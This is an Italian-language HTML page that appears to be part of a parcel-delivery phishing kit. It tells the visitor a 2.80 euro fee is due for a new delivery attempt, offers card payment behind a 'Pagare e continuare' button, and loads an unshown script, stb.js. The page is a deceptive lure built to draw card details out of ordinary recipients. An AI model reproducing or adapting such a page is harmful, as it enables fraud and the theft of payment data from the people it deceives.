<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/pag1.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body>
    <div class="hed">
        <img src="./img/lojo.png" alt="">
    </div>

    <div class="haz">
        <div class="paco">
             <img src="./img/pacco.png" alt="">
             <p>IL TUO PACCHETTO</p>
        </div>
        <p><span>FASE 1:</span> PAGAMENTO DEI COSTI DEL NUOVO TENTATIVO DI CONSEGNA </p>

        <span>IMPORTAZIONE : 2,80 €.</span>

        <p>METODO DI PAGAMENTO :</p>

        <div style="display: flex; justify-content: center; margin-top: -20px; margin-bottom: 40px;">
            <div> <img width="20"  src="./img/cc.png" alt=""></div>
            <span style="margin-left: 8px; color: rgb(138, 138, 138);">CARTA</span>
        </div>

        <!--  -->
        <button id="do" type="button" class="btn1">PAGARE E CONTINUARE</button> <br>
        <button id="dont" type="button" class="btn2">Cancella</button>
    </div>
    <!-- my scripts ;-{ -->
    <script src="./js/stb.js"></script>

</body>
</html>